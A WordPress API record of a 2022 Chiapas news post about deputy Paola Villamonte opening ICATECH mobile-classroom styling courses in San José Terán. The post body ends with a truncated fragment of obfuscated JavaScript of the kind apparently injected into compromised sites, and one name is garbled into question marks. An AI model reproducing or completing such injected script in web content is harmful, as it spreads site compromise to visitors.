{"id":3700,"date":"2022-07-18T23:44:42","date_gmt":"2022-07-18T23:44:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3700"},"modified":"2022-07-18T23:44:43","modified_gmt":"2022-07-18T23:44:43","slug":"paola-villamonte-inaugura-jornada-de-capacitacion-en-unidad-movil-icatech-en-san-jose-teran","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3700","title":{"rendered":"PAOLA VILLAMONTE INAUGURA JORNADA DE CAPACITACI\u00d3N EN UNIDAD M\u00d3VIL ICATECH, EN SAN JOS\u00c9 TER\u00c1N"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0034-1024x768.jpg\" alt=\"\" class=\"wp-image-3701\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0034-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0034-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0034-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0034-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0034.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>18 de Julio del 2022. En coordinaci\u00f3n con el Instituto de Capacitaci\u00f3n y Vinculaci\u00f3n Tecnol\u00f3gica del Estado de Chiapas (ICATECH) que dirige la Maestra ??????? ??????\u210e ????????? ?????, la diputada por el distrito XIII de Tuxtla Guti\u00e9rrez, Paola Villamonte P\u00e9rez, llev\u00f3 a cabo la inauguraci\u00f3n de los cursos de capacitaci\u00f3n de estilismo, en Aula M\u00f3vil ICATECH en la colonia San Jos\u00e9 Ter\u00e1n.<\/p>\n\n\n\n<p>Paola Villamonte explic\u00f3 que estas capacitaciones surgen de la necesidad de ofrecer a la ciudadan\u00eda de Tuxtla Guti\u00e9rrez la oportunidad de aprender \u00f3 reforzar conocimientos, como mecanismo de emprendimiento y herramientas de trabajo. Externo adem\u00e1s que, gracias al impulso decidido del gobernador del Estado, Rutilio Escand\u00f3n Cadenas, la capacitaci\u00f3n y vinculaci\u00f3n tecnol\u00f3gica llega a cada rinc\u00f3n de Chiapas, acercando los servicios a la poblaci\u00f3n m\u00e1s vulnerable, lo que les permite tener mejores condiciones de vida.<\/p>\n\n\n\n<p>\u201cPor primera vez las Unidades M\u00f3viles que recorren el Estado se acercan a Tuxtla Gutierrez, para brindar conocimiento y capacitaci\u00f3n para un emprendimiento y un mejor futuro. Nos sentimos muy contentos porque es una gran oportunidad para que m\u00e1s personas se capaciten, obtengan un certificado que les d\u00e9 validez, adem\u00e1s de brindar la oportunidad para crear sus propios negocios y aspirar a un trabajo digno que contribuya a la econom\u00eda de las familias y al desarrollo de Chiapas\u201d expres\u00f3.<\/p>\n\n\n\n<p>La legisladora agradeci\u00f3 el apoyo por parte de la Mtra. Fabiola Lizbeth Astudillo Reyes, directora general del ICATECH por su compromiso y disposici\u00f3n para realizar las jornadas de capacitaci\u00f3n en las Aulas m\u00f3viles en la capital del Estado, en la cual en esta primera etapa se ver\u00e1n beneficiadas 30 personas y por ende el mismo n\u00famero de familias.&nbsp;<\/p>\n\n\n\n<p>Por su parte, las beneficiarias agradecieron a la diputada Paola Villamonte por las gestiones para acercar estos cursos y por beneficiarlas con el kit de herramientas para iniciar la capacitaci\u00f3n, lo que contribuye a su econom\u00eda.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>18 de Julio del 2022. En coordinaci\u00f3n con el Instituto de Capacitaci\u00f3n y Vinculaci\u00f3n Tecnol\u00f3gica del Estado de Chiapas (ICATECH) que dirige la Maestra ??????? ??????\u210e ????????? ?????, la diputada por el distrito XIII de Tuxtla Guti\u00e9rrez, Paola Villamonte P\u00e9rez, llev\u00f3 a cabo la inauguraci\u00f3n de los cursos de capacitaci\u00f3n de estilismo, en Aula M\u00f3vil &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3701,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3700","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3700","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3700"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3700\/revisions"}],"predecessor-version":[{"id":3702,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3700\/revisions\/3702"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3701"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3700"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3700"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3700"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}